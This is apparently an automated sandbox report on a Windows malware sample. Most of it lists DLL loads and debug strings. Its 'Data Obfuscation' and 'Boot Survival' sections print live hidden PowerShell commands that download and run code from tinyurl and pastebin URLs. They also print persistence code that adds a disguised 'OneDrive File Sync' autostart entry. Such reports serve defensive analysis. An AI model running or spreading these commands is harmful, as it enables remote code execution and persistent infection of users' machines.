Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\vF20HtY4a4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
Source: BeginSync.lnk.3.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\vF20HtY4a4.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: vF20HtY4a4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vF20HtY4a4.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: vF20HtY4a4.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: vF20HtY4a4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB84F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbc source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 0000000A.00000002.3020771983.0000025459F59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2870296573.000001FDFB620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB819000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbx86) source: powershell.exe, 0000000A.00000002.3022670812.000002545A173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB819000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb- source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdb source: vF20HtY4a4.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb=C:\% source: powershell.exe, 0000000A.00000002.3022670812.000002545A173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2870296573.000001FDFB644000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb" source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb` source: powershell.exe, 0000000F.00000002.2870296573.000001FDFB620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbA{1 source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB7DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3020771983.0000025459F40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2870296573.000001FDFB5A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscoree.dllKC:/Users/GLaDOS/The/Cake/Is/A/Lie.pdb source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A0F3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB7DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000A.00000002.3020771983.0000025459F40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2870296573.000001FDFB5A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB819000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator.ADMINISTRATOR\Downloads\Origami-master\Origami-master\src\obj\x64\Release\net472\Origami.pdbSHA256 source: vF20HtY4a4.exe
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbh/ source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2871390762.000001FDFB84F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.3021367651.000002545A141000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB876000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: vF20HtY4a4.exeStatic PE information: 0xDE7ACC38 [Mon Apr 12 06:27:04 2088 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34653D0D push E95CE3B6h; ret 10_2_00007FFD34653D39
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465EEB7 push es; retf 10_2_00007FFD3465EEBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465EF8A push es; retf 10_2_00007FFD3465EF90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465110F pushfd ; ret 10_2_00007FFD34651112
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465E1DA push edx; iretd 10_2_00007FFD3465E1DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34726DC3 push edi; iretd 10_2_00007FFD34726DC6

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = 